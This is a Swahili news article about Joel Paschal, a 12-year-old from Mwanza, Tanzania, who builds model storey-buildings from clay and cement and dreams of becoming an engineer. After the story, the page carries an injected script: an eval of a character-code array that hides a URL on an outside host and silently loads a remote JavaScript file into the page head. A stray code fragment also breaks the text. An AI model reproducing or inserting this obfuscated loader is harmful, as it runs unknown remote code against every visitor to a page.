Joel Paschal mtoto mwenye miaka 12 tu aliyeweza kujenga ghorofa kwa kutumia kipaji chake tu bila kufundishwa na mtu yoyote akitumia tu uwezo wake binafsi na kuiga muonekano wa Ghorofa na kujenga kwa kutumia udongo na simenti kiasi.
Kijana huyu anaishi kijiji cha Malimbe kata ya Luchelele mkoani Mwanza akiwa ni mtoto wa pili ya familia yao yenye watoto watatu.
Kiuhalisia Joel ni mtoto anayetokea familia ya chini kabisa ambapo Alieleza kuwa, familia hutumia kuni kama chanzo cha nishati, nyumbani hakuna umeme na pia baba pekee ndiye mwenye simu na hata siyo simu janja waswahili wanasema ana kiswaswadu.
Akizungumza na Simamia Tv aliongeza kuwa kaka yao hasomi ila yeye na mdogo wake ndiyo bado wanasoma ambapo yeye yupo darasa la nne katika shule ya Kanisa la BMCC iitwayo Shekinah Primary school ambayo ni shule ya English medium.
Joel aligundua kipaji chake cha kujenga akiwa mdogo sana ambapo ameanza kujenga rasmi miaka miwili iliyopita alsema ” najua kujenga tangu mtoto ila nimeanza kusimamisha hizi nyumba nikiwa na miaka kumi”.
Anapojenga kijana huyu hutumia kokoto, simenti kidogo, vitofali vya udongo, mbao ambazo hutumika kama nondo ambapo hii humsaidia kujenga jengo imara ha mvua ikinyesha lisibomoke.
Aliongeza kuwa anatamani sana kujenga barabara na kufanikisha kujifunza mbinu nyingi za ujenzi na kupaka rangi ili atengeneze vitu bora zaidi na kuwa injinia mkubwa duniani.
Kiuhalisia alisema kuwa nyumbani kwao hakuna mtu anayejenga anamfahamu ila amejikuta tu akipenda sana kujenga bila kumuiga mzazi yoyote.
Joel anasema mama anasapoti zaidi lakini pia baba humpa simenti na pia humwambia atakuja kuwa mtu mkubwa sana huko ukubwani hali inayompa nguvu ya kukazana zaidi.
Aliongeza kuwa, Angependa kusaidiwa kukuza kipaji chake cha ujenzi hata kwa kupelekwa shule za ufundi ili aweze kuwa injinia wa majengo na barabara mana ndicho anachopenda na anatambua kuwa uwezo wa wazazi wake kwa sasa hauwe kumpleleka hizo shule maalumu.
var f=
Mtoto Anayejenga Ghorofa kwa Mikono yake Mwenyewe
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments